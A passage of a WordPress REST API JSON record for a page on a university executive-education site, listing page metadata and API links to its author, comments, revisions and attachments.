[&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":36,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-3204","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages\/3204","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/comments?post=3204"}],"version-history":[{"count":0,"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/pages\/3204\/revisions"}],"wp:attachment":[{"href":"https:\/\/qlu.ac.pa\/executive-education\/wp-json\/wp\/v2\/media?parent=3204"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}